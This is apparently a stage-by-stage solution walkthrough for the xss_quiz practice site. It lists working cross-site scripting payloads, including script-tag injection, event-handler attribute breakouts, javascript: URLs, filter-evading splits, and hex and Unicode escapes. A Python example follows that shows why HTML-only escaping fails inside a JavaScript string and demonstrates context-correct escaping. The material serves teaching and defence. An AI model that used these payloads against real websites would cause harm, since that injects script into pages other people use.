Practice site: xss_quiz
Stage #1
<script>alert(document.domain)</script>
Stage #2
"><script>alert(document.domain)</script>
Stage #3
Stage #4
Stage #5
Use Firebug to remove maxlength="15" from the input element
Then enter in the text box: "><script>alert(document.domain)</script>
Stage #6
" onmouseover="alert(document.domain);"
Stage #7
" onmouseover=alert(document.domain);
Stage #8
javascript:alert(document.domain);
Stage #9
Hint: UTF-7 XSS. The hint points at UTF-7; I did not manage to exploit it.
Stage #10
"><script>alert(document.dodomainmain)</script>
Stage #11
"><a href="javascrip	t:alert(document.domain);">foo</a>
Stage #12
``onmouseover=alert(document.domain);
(IE Only)
Stage #13
Stage #14
Stage #15
Hex-encode '>' and '<' as JavaScript string escapes
\x3Cscript\x3Ealert(document.domain)\x3C/script\x3E
Stage #16
Unicode-encode '>' and '<' as JavaScript string escapes
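Stages 15 and 16 both rely on the same weakness: the value is written into a JavaScript string literal, so a filter that only HTML-entity-encodes angle brackets never sees one, and the JS engine turns \x3C / \u003C back into '<' before document.write() runs. The Python below is an added example (not code from the quiz site or the original write-up). It models a hypothetical page that writes the value via document.write, uses a simplified JS string-literal decoder (only \xHH, \uHHHH and single-character escapes) to show what the browser would actually insert, and puts the HTML-only filter beside the context-correct fix: serialise for the JavaScript string context and also escape <, > and & so the literal can never close the enclosing script element. The sample payloads are the page's own two encodings.

```python
import html
import json
import re

# Constructed sample inputs in the two forms the write-up describes for
# Stage 15 (\xHH) and Stage 16 (\uHHHH); no literal '<' or '>' in either.
HEX_ESCAPED = r"\x3Cscript\x3Ealert(document.domain)\x3C/script\x3E"
UNICODE_ESCAPED = r"\u003Cscript\u003Ealert(document.domain)\u003C/script\u003E"

# Hypothetical vulnerable template: the value lands inside a JS string literal
# and is then written into the document (assumption, not the quiz's real page).
_TEMPLATE = "<script>var q = %s; document.write(q);</script>"


def render_html_escaped_only(value: str) -> str:
    """Insecure: HTML-entity encoding is the wrong escaping for a JS string.
    Quotes are neutralised, but JS escape sequences pass through untouched."""
    return _TEMPLATE % ("'" + html.escape(value, quote=True) + "'")


def render_js_escaped(value: str) -> str:
    """Fix: json.dumps yields a quoted literal with backslashes doubled, so
    \\x3C stays the four characters backslash-x-3-C.  '<', '>' and '&' are
    additionally escaped so the literal cannot contain '</script>'."""
    literal = json.dumps(value)
    literal = (literal.replace("<", "\\u003c")
                      .replace(">", "\\u003e")
                      .replace("&", "\\u0026"))
    return _TEMPLATE % literal


_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\(.)")


def js_string_decode(literal: str) -> str:
    """Decode a quoted JS string literal the way the engine does, for the
    escape forms this example needs (simplified model, not a full parser)."""
    body = literal[1:-1]

    def repl(m: re.Match) -> str:
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return m.group(3)  # \\ -> \ , \" -> " , \' -> '

    return _ESC.sub(repl, body)


def written_markup(rendered: str) -> str:
    """Return the text document.write() would insert for a rendered page."""
    start = len("<script>var q = ")
    end = rendered.index("; document.write")
    return js_string_decode(rendered[start:end])


def contains_script_tag(markup: str) -> bool:
    """Detection check: did a live <script> element reach the document?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for payload in (HEX_ESCAPED, UNICODE_ESCAPED):
        weak = written_markup(render_html_escaped_only(payload))
        fixed = written_markup(render_js_escaped(payload))
        print("html-escape only ->", repr(weak), contains_script_tag(weak))
        print("js-context escape ->", repr(fixed), contains_script_tag(fixed))
```

Run it and the HTML-only filter decodes both payloads into a live script element, while the JS-context escaping leaves them as inert text; benign input survives both paths unchanged, which is the property to check when retro-fitting the escaping in a template.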